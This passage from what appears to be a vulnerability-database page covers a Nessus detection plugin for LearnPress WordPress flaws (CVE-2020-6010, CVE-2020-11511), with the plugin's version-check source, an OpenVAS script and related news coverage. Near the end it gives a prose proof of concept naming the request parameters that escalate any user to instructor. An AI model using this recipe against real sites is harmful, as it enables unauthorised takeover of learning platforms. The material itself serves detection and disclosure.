Search...

WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities

2020-05-01T00:00:00

ID WORDPRESS_PLUGIN_LEARNPRESS_3_2_6_8.NASL
Type nessus
Reporter This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2022-05-13T00:00:00

Description

The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8 and, thus, is affected by multiple vulnerabilities :

A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)

A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)

Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(136191);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/05/13");

  script_cve_id("CVE-2020-6010", "CVE-2020-11511");

  script_name(english:"WordPress Plugin 'LearnPress' &lt; 3.2.6.8 Multiple Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote WordPress application has a plugin installed that is vulnerable to multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8
and, thus, is affected by multiple vulnerabilities :

  - A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class
    due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to
    inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of
    arbitrary data. (CVE-2020-6010)

  - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the
    code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit
    this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)

Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's
self-reported version number.");
  # https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b38b6cba");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/learnpress/#developers");
  script_set_attribute(attribute:"solution", value:
"Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-11511");
  script_set_attribute(attribute:"cvss3_score_source", value:"CVE-2020-6010");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/03/30");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/03/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/05/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_plugin_detect.nbin");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include('vcf.inc');
include('vcf_extras.inc');

app_info = vcf::wordpress::plugin::get_app_info(plugin:'learnpress');
vcf::check_granularity(app_info:app_info, sig_segments:2);

constraints = [
  { 'fixed_version' : '3.2.6.8' }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{sqli:TRUE});

JSON Vulners Source

Initial Source

{"id": "WORDPRESS_PLUGIN_LEARNPRESS_3_2_6_8.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities", "description": "The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8 and, thus, is affected by multiple vulnerabilities :\n\n - A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "published": "2020-05-01T00:00:00", "modified": "2022-05-13T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/136191", "reporter": "This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b38b6cba", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11511", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6010", "https://wordpress.org/plugins/learnpress/#developers"], "cvelist": ["CVE-2020-11511", "CVE-2020-6010"], "immutableFields": [], "lastseen": "2022-05-15T13:47:27", "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-11511", "CVE-2020-6010"]}, {"type": "exploitdb", "idList": ["EDB-ID:50137", "EDB-ID:50138"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163536", "PACKETSTORM:163538"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1"]}, {"type": "thn", "idList": ["THN:047CA924D8DECEDDC49DB26C77A3339B"]}, {"type": "threatpost", "idList": ["THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB"]}, {"type": "wpexploit", "idList": ["WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335"]}, {"type": "zdt", "idList": ["1337DAY-ID-36565", "1337DAY-ID-36566"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-11511", "CVE-2020-6010"]}, {"type": "exploitdb", "idList": ["EDB-ID:50137", "EDB-ID:50138"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107443", "OPENVAS:1361412562310112737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163536", "PACKETSTORM:163538"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1"]}, {"type": "thn", "idList": ["THN:047CA924D8DECEDDC49DB26C77A3339B"]}, {"type": "threatpost", "idList": ["THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB"]}, {"type": "wpexploit", "idList": ["WPEX-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:22B2CBAA-9173-458A-BC12-85E7C96961CD", "WPVDB-ID:B65A4C93-0F6D-461E-B3E0-7DBE29918335"]}, {"type": "zdt", "idList": ["1337DAY-ID-36565", "1337DAY-ID-36566"]}]}, "exploitation": null, "vulnersScore": 6.9}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "136191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136191);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-6010\", \"CVE-2020-11511\");\n\n script_name(english:\"WordPress Plugin 'LearnPress' < 3.2.6.8 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'LearnPress' plugin that is prior to 3.2.6.8\nand, thus, is affected by multiple vulnerabilities :\n\n - A SQL injection (SQLi) vulnerability exists in the _get_items method of the LP_Modal_Search_Items class\n due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to\n inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of\n arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the\n code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit\n this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n # https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b38b6cba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/learnpress/#developers\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11511\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-6010\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'learnpress');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'fixed_version' : '3.2.6.8' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{sqli:TRUE});\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Update the 'LearnPress' plugin to version 3.2.6.8 or later through the administrative dashboard.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-11511", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-03-30T00:00:00", "vulnerabilityPublicationDate": "2020-03-30T00:00:00", "exploitableWith": []}

{"nessus": [{"lastseen": "2022-02-19T12:39:45", "description": "The WordPress LearnPress Plugin installed on the remote host is affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists in the _get_items method of the LP_Modal_Search_Items class due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2020-6010)\n\n - A privilege escalation vulnerability exists in the learn_press_accept_become_a_teacher function due to the code not checking the permissions of the requesting user. An unauthenticated, remote attacker can exploit this, via /wpadmin/, to gain 'teacher' access to the application. (CVE-2020-11511)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-14T00:00:00", "type": "nessus", "title": "LearnPress Plugin for WordPress < 3.2.6.9 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6010", "CVE-2020-11511"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*"], "id": "WEB_APPLICATION_SCANNING_112388", "href": "https://www.tenable.com/plugins/was/112388", "sourceData": "No source data", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-08T09:12:07", "description": "LearnPress plugin for WordPress is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-05T00:00:00", "type": "openvas", "title": "WordPress LearnPress Plugin < 3.2.6.9 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11510", "CVE-2020-6010", "CVE-2020-11511"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310112737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112737", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112737\");\n script_version(\"2020-05-05T10:09:51+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:09:51 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-05 09:22:00 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-6010\", \"CVE-2020-11510\", \"CVE-2020-11511\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress LearnPress Plugin < 3.2.6.9 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_wordpress_plugin_http_detect.nasl\");\n script_mandatory_keys(\"learnpress/detected\");\n\n script_tag(name:\"summary\", value:\"LearnPress plugin for WordPress is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - SQL injection (CVE-2020-6010)\n\n - Authenticated page creation and status modification (CVE-2020-11510)\n\n - Privilege escalation (CVE-2020-11511)\");\n\n script_tag(name:\"affected\", value:\"WordPress LearnPress plugin before version 3.2.6.9.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.2.6.9 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.wordfence.com/blog/2020/04/high-severity-vulnerabilities-patched-in-learnpress/\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:thimpress:learnpress\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"3.2.6.9\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.6.9\", install_path: location );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:29", "description": "[![WordPress Online Learning Plugin](https://thehackernews.com/images/-xJ7Dvr5LbDI/XqqdT_vNg7I/AAAAAAAAAR8/JIaPS--WdGweXDZLNMngwaB4_2S1Bid9ACLcBGAsYHQ/s728-e100/Online-Learning-WordPress-Plugin.jpg)](<https://thehackernews.com/images/-xJ7Dvr5LbDI/XqqdT_vNg7I/AAAAAAAAAR8/JIaPS--WdGweXDZLNMngwaB4_2S1Bid9ACLcBGAsYHQ/s728-e100/Online-Learning-WordPress-Plugin.jpg>)\n\nSecurity researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system ([LMS](<https://en.wikipedia.org/wiki/Learning_management_system>)) plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. \n \nAccording to the Check Point Research Team, the three WordPress plugins in question \u2014 [LearnPress](<https://wordpress.org/plugins/learnpress/>), [LearnDash](<https://www.learndash.com/>), and [LifterLMS](<https://wordpress.org/plugins/lifterlms/>) \u2014 have security flaws that could permit students, as well as unauthenticated users, to pilfer personal information of registered users and even attain teacher privileges. \n \n\"Because of coronavirus, we're doing everything from our homes, including our formal learning,\" [Check Point](<https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/>) Research's Omri Herscovici said. \"The vulnerabilities found allow students, and sometimes even unauthenticated users, to gain sensitive information or take control of the LMS platforms.\" \n \nThe three LMS systems are installed on approximately 100,000 different educational platforms, including major universities such as the University of Florida, the University of Michigan, and the University of Washington, among others. \n \nLearnPress and LifterLMS alone have been downloaded over 1.6 million times since their launch. \n \n\n\n## Multiple Vulnerabilities in WordPress LMS Plugins\n\n \nLMS facilitates online learning via a software application that lets academic institutions and employers create course curriculum, share coursework, enroll students, and evaluate students with quizzes. \n \nPlugins such as LearnPress, LearnDash, and LifterLMS make it easy by adapting any WordPress site to a fully functioning and easy-to-use LMS. \n \n\n\n[![WordPress Online Learning Plugin](https://thehackernews.com/images/-0mYATefJFjo/Xqqdb-QKKOI/AAAAAAAAASA/U2OQ2qDfJtwCO6NdShwVxIrMESQFtLm2wCLcBGAsYHQ/s728-e100/hacking-code.jpg)](<https://thehackernews.com/images/-0mYATefJFjo/Xqqdb-QKKOI/AAAAAAAAASA/U2OQ2qDfJtwCO6NdShwVxIrMESQFtLm2wCLcBGAsYHQ/s728-e100/hacking-code.jpg>)\n\n \nThe flaws in LearnPress range from [blind SQL injection](<https://owasp.org/www-community/attacks/Blind_SQL_Injection>) (CVE-2020-6010) to privilege escalation ([CVE-2020-11511](<https://www.wordfence.com/blog/2020/04/high-severity-vulnerabilities-patched-in-learnpress/>)), which can authorize an existing user to gain a teacher's role. \n \n\"Unexpectedly, the code doesn't check the permissions of the requesting user, therefore letting any student call this function,\" the researchers stated. \n \nLearnDash, likewise, suffers from a SQL injection flaw (CVE-2020-6009) that allows an adversary to craft a malicious SQL query by using PayPal's Instant Payment Notification ([IPN](<https://developer.paypal.com/developer/ipnSimulator/>)) message service simulator to trigger fake course enrollment transactions. \n \nLastly, LifterLMS's arbitrary file write vulnerability (CVE-2020-6008) exploits the dynamic nature of PHP applications to allow an attacker, e.g., a student registered for a specific course, to change their profile name to a malicious piece of PHP code. \n \nIn total, the flaws make it possible for attackers to steal personal information (names, emails, usernames, passwords, etc\u2026), and students to change grades, retrieve tests and test answers beforehand, and also forge certificates. \n \n\"The platforms involve payment; therefore, financial schemes are also applicable in the case of modifying the website without webmaster's information,\" the researchers warned. \n \nCheck Point Research said the vulnerabilities were discovered in March and were responsibly disclosed to the concerned platforms. All three LMS systems have since released patches to address the issues. \n \nIt's recommended that users upgrade to the latest versions of these plugins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T10:06:00", "type": "thn", "title": "Critical Bugs Found in 3 Popular e-Learning Plugins for WordPress Sites", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11511", "CVE-2020-6008", "CVE-2020-6009", "CVE-2020-6010"], "modified": "2020-04-30T11:07:09", "id": "THN:047CA924D8DECEDDC49DB26C77A3339B", "href": "https://thehackernews.com/2020/04/wordpress-lms-plugins.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-08T22:34:47", "description": "Researchers have disclosed critical-severity flaws in three popular WordPress plugins used widely by colleges and universities: LearnPress, LearnDash and LifterLMS. The flaws, now patched, could allow students to steal personal information, change their grades, cheat on tests and more.\n\nThe vulnerable plugins have been installed on more than 130,000 school websites \u2014 including ones used the University of Florida, University of Michigan and University of Washington. Schools leverage these plugins as part of their learning management systems (LMS). LMS platforms, used to administer, track and organize coursework, are vital right now for schools quickly moving classrooms online during the coronavirus pandemic.\n\n[LearnPress](<https://wordpress.org/plugins/learnpress/>) is used on LMS platforms to create courses with quizzes and lessons for students, and has an install base of 80,000. [LearnDash](<https://www.learndash.com>) provides tools for selling online coursework, and is used by more than 33,000 websites. And, [LifterLMS](<https://wordpress.org/plugins/lifterlms/#developers>) provides sample course and quizzes, and is used by more than 17,000 websites.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe proved that hackers could easily take control of the entire e-learning platform. Top educational institutions, as well as many online academies, rely on the systems that we researched in order to run their entire online courses and training programs,\u201d Omri Herscovici, Check Point vulnerability research team leader, said in a Thursday analysis. \u201cThe vulnerabilities found allow students, and sometimes even unauthenticated users, to gain sensitive information or take control of the LMS platforms. We urge the relevant educational establishment everywhere to update to the latest versions of all the platforms.\u201d\n\nThe flaws range in seriousness and impact, but could allow third-party attackers to steal personal information (such as names, emails, usernames and passwords) or target the financial payment methods that are tied to the platforms. In addition, the flaws could have given students the ability to change the grades for themselves or their friends, retrieve tests before they are administered, escalate their privileges to those of a teacher and forge graduation certificates.\n\nThreatpost has reached out to LearnPress, LearnDash and LifterLMS for further comment.\n\n## **Technical Details **\n\nResearchers found the flaws in a span of two weeks during March. All vulnerabilities have since been reported to the plugins and patched.\n\nA time-based blind SQL injection vulnerability (CVE-2020-6010) exists in versions 3.2.6.7 and earlier of LearnPress, which researchers said \u201cis very trivial to identify and exploit.\u201d Specifically, the flaw exists in the method _get_items of the class LP_Modal_Search_Items. The method fails to sufficiently sanitize user-supplied data before using it in an SQL query. This can be exploited by an authenticated attacker by merely specially crafted request to the /wp-admin/admin-ajax.php endpoint page.\n\nDoing so would \u201callow students and even unauthenticated users to retrieve the entire content of the database and steal personal information just like in any other compromised platform that has registered users (names, emails, usernames, passwords, etc\u2026),\u201d Herscovici told Threatpost. \u201cGetting the administrator hash and cracking it allows the attacker to get full control over the server.\u201d\n\nIn another flaw in LearnPress (CVE-2020-11511), the function learn_press_accept_become_a_teacher doesn\u2019t check the permissions of the requesting user \u2013 so anyone can call the function, whether they\u2019re a teacher or not. The privilege-escalation flaw can be leveraged by a student to upgrade to a teacher role \u2013 giving themselves access to grades, tests and more.\n\nIn versions earlier than 3.1.6 of LearnDash, researchers found an unauthenticated second order SQL injection (CVE-2020-6009), stemming from the ld-groups.php file. The file failed to sanitize user-suppled data before using it in an SQL query. Similar to CVE-2020-6010, this flaw enables attackers to access the entire content of the database and steal personal information. The flaw ranks [9.8 out of 10 on the CVSS scale,](<https://nvd.nist.gov/vuln/detail/CVE-2020-6009>) making it critical in severity.\n\nFinally, researchers found an arbitrary file-write flaw (CVE-2020-6008) in versions earlier than 3.37.15 of LifterLMS. The flaw exists due to the insufficient validation of files during file upload; remote attackers can leverage the flaw to execute code and effectively take over the learning platforms. This flaw ranks [9.8 out of 10 on the CVSS scale](<https://nvd.nist.gov/vuln/detail/CVE-2020-6008>), making it critical severity.\n\n\u201cThe SQL injection is very dangerous since it allows stealing the entire database of the website with all the information, including the admin\u2019s hashed password,\u201d Herscovici told Threatpost. \u201cBut the most dangerous one is the arbitrary file-write (CVE-2020-6008) which allows the attacker to upload any code of their own to the server, thus instantly achieving full remote code execution.\u201d\n\nThe flaws come as universities and colleges face unprecedented [remote-work security issues](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>), after having to send students home and set up courses online due to the [coronavirus pandemic](<https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/>).\n\nThe threat is not hypothetical: Previously uncovered malware campaigns have targeted the education industries, including one looking to compromise a [Canadian medical research university](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>). Other schools have been hit by [Zoom-bombing attacks](<https://threatpost.com/zoom-scrutinized-as-security-woes-mount/154305/>), where attackers hijack online classes using the Zoom platform to spew hateful messages or videos. And last week, researchers said several U.S. universities [were targeted in a widespread spear-phishing attack](<https://threatpost.com/us-universities-adult-dating-spear-phishing-attack/155170/>) that uses adult dating as a lure. In reality, the emails spread the Hupigon remote access trojan (RAT), known to be leveraged by state-sponsored threat actors.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-04-30T10:00:32", "type": "threatpost", "title": "Critical WordPress e-Learning Plugin Bugs Open Door to Cheating", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11511", "CVE-2020-6008", "CVE-2020-6009", "CVE-2020-6010"], "modified": "2020-04-30T10:00:32", "id": "THREATPOST:5616BD8EF36ADE42C8FA173A80A1B5EB", "href": "https://threatpost.com/critical-wordpress-e-learning-plugin-bugs-cheating/155290/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:19:44", "description": "The LearnPress plugin through 3.2.6.8 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter. The \"LP Instructor\" role grants the \"unfiltered_html\" capability, allowing an escalated user to insert posts containing malicious JavaScript\n\n### PoC\n\nIt is possible for a remote attacker to elevate the privileges of any user to LP Instructor by sending a request to any location within wp-admin, such as wp-admin/admin-post.php with the action parameter set to accept-to-be-teacher and the user_id parameter set to an arbitrary user ID. This is possible because the learn_press_accept_become_a_teacher function runs on the plugins_loaded action and lacks nonce checks and capability checks.\n", "cvss3": {}, "published": "2020-04-28T00:00:00", "type": "wpvulndb", "title": "LearnPress < 3.2.6.9 - Privilege Escalation to 